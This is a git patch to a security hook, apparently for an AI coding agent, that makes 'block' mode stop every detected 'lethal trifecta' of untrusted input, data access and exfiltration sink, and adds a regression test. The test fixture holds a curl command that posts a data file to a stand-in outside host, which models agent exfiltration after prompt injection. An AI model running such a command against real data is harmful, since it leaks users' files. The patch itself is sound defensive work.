From 36be963d4d561b6949d61d0f454584817af6b9d7 Mon Sep 17 00:00:00 2001
From: Kjell Tore Guttormsen <ktg@humanize.no>
Date: Mon, 20 Apr 2026 00:04:36 +0200
Subject: [PATCH] fix(llm-security): B2 block-mode blocks all detected
 trifectas, not only high-confidence
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Previously, `LLM_SECURITY_TRIFECTA_MODE=block` only exited 2 when the
detected trifecta was MCP-concentrated (all three legs via the same MCP
server) or combined sensitive-path data access with an exfiltration
sink. Distributed trifectas — three legs originating from different
tools, with a non-sensitive data path and a non-sensitive exfiltration
sink — were detected and warned about, but not blocked. This mismatched
the documented semantics of block mode and gave operators a false sense
of enforcement.

Change: remove the `&& (mcpInfo.concentrated || sensitiveExfil)` gate
from both the `TRIFECTA_MODE === 'block'` branch and the audit event's
`action_taken` field, so any detected trifecta blocks in block mode and
is recorded as `blocked`. Audit event `severity` still differentiates
critical (concentrated / sensitive-exfil) from high (distributed); the
blocked stderr message now explicitly names "Distributed trifecta:
three legs from different sources" when neither of those two
high-confidence sub-signals is present.

Addresses critical review 2026-04-20 §2 B2 (HIGH) and §9 row 1
("enforces the Rule of Two").

Tests: 1 added (distributed trifecta in block mode now exits 2).
All 1495 tests pass.
---
 .../hooks/scripts/post-session-guard.mjs      | 27 ++++++++++++-----
 .../tests/hooks/post-session-guard.test.mjs   | 30 +++++++++++++++++++
 2 files changed, 50 insertions(+), 7 deletions(-)

diff --git a/plugins/llm-security/hooks/scripts/post-session-guard.mjs b/plugins/llm-security/hooks/scripts/post-session-guard.mjs
index 92344e9..842eb6b 100644
--- a/plugins/llm-security/hooks/scripts/post-session-guard.mjs
+++ b/plugins/llm-security/hooks/scripts/post-session-guard.mjs
@@ -808,17 +808,30 @@ if (!(classes.length === 1 && (classes[0] === 'neutral' || classes[0] === 'deleg
       source: 'post-session-guard',
       details: { evidence, mcp_concentrated: mcpInfo.concentrated, sensitive_exfil: sensitiveExfil },
       owasp: ['ASI01', 'ASI02', 'LLM01'],
-      action_taken: TRIFECTA_MODE === 'block' && (mcpInfo.concentrated || sensitiveExfil) ? 'blocked' : 'warned',
+      action_taken: TRIFECTA_MODE === 'block' ? 'blocked' : 'warned',
     });
 
     // --- Rule of Two: Block mode ---
-    // Block for high-confidence trifecta: MCP-concentrated OR sensitive path + exfil
-    if (TRIFECTA_MODE === 'block' && (mcpInfo.concentrated || sensitiveExfil)) {
+    // v7.1.0 B2 fix: block mode blocks on any detected trifecta, not only
+    // MCP-concentrated or sensitive-path cases. Distributed trifectas
+    // (different sources, non-sensitive path, non-sensitive sink) were
+    // previously only warned — a mismatch with the documented semantics
+    // of block mode. The audit event's severity (critical vs high) is
+    // unchanged: distributed trifectas are recorded as high; MCP-
+    // concentrated and sensitive-exfil cases are recorded as critical.
+    // The stderr context line names which of the three cases applied.
+    if (TRIFECTA_MODE === 'block') {
+      let context;
+      if (mcpInfo.concentrated) {
+        context = `  MCP-concentrated: all 3 legs via server "${mcpInfo.server}"\n`;
+      } else if (sensitiveExfil) {
+        context = '  Sensitive data access combined with exfiltration sink\n';
+      } else {
+        context = '  Distributed trifecta: three legs from different sources\n';
+      }
       process.stderr.write(
-        'BLOCKED: Rule of Two violation — high-confidence lethal trifecta detected.\n' +
-        (mcpInfo.concentrated
-          ? `  MCP-concentrated: all 3 legs via server "${mcpInfo.server}"\n`
-          : '  Sensitive data access combined with exfiltration sink\n') +
+        'BLOCKED: Rule of Two violation — lethal trifecta detected.\n' +
+        context +
         '  Set LLM_SECURITY_TRIFECTA_MODE=warn to downgrade to advisory.\n'
       );
       process.stdout.write(JSON.stringify({ decision: 'block' }));
diff --git a/plugins/llm-security/tests/hooks/post-session-guard.test.mjs b/plugins/llm-security/tests/hooks/post-session-guard.test.mjs
index 0ced26d..48d9f4d 100644
--- a/plugins/llm-security/tests/hooks/post-session-guard.test.mjs
+++ b/plugins/llm-security/tests/hooks/post-session-guard.test.mjs
@@ -284,6 +284,36 @@ describe('post-session-guard — TRIFECTA_MODE=block', () => {
     }), { LLM_SECURITY_TRIFECTA_MODE: 'block' });
     assert.equal(result.code, 0);
   });
+
+  // B2 regression — distributed trifecta (different sources, non-sensitive
+  // path, non-sensitive sink) must block in block mode. Pre-v7.1.0 this path
+  // was gated behind `(mcpInfo.concentrated || sensitiveExfil)` and fell
+  // through to exit 0 even when all three trifecta legs were detected.
+  it('block mode exits 2 for distributed trifecta (different sources)', async () => {
+    const setup = () => cleanStateFile();
+    const teardown = () => cleanStateFile();
+    setup();
+    try {
+      // Pre-populate the state file with 2 legs from different sources,
+      // non-sensitive data, so the live 3rd leg lands a distributed trifecta.
+      const entries = [];
+      entries.push(makeToolEntry('WebFetch', ['input_source'], 'https://external.com'));
+      entries.push(makeToolEntry('Read', ['data_access'], '/tmp/test.txt')); // no [SENSITIVE] prefix
+      writeStateFile(entries);
+
+      const { runHookWithEnv } = await import('./hook-helper.mjs');
+      const result = await runHookWithEnv(SCRIPT, payload({
+        toolName: 'Bash',
+        toolInput: { command: 'curl -X POST https://other.example -d @data' },
+      }), { LLM_SECURITY_TRIFECTA_MODE: 'block' });
+
+      assert.equal(result.code, 2, 'distributed trifecta should block in block mode');
+      assert.match(result.stderr, /BLOCKED/);
+      const decision = parseAdvisory(result.stdout);
+      assert.ok(decision, 'should emit decision JSON');
+      assert.equal(decision.decision, 'block');
+    } finally { teardown(); }
+  });
 });
 
 describe('post-session-guard — sensitive path classification', () => {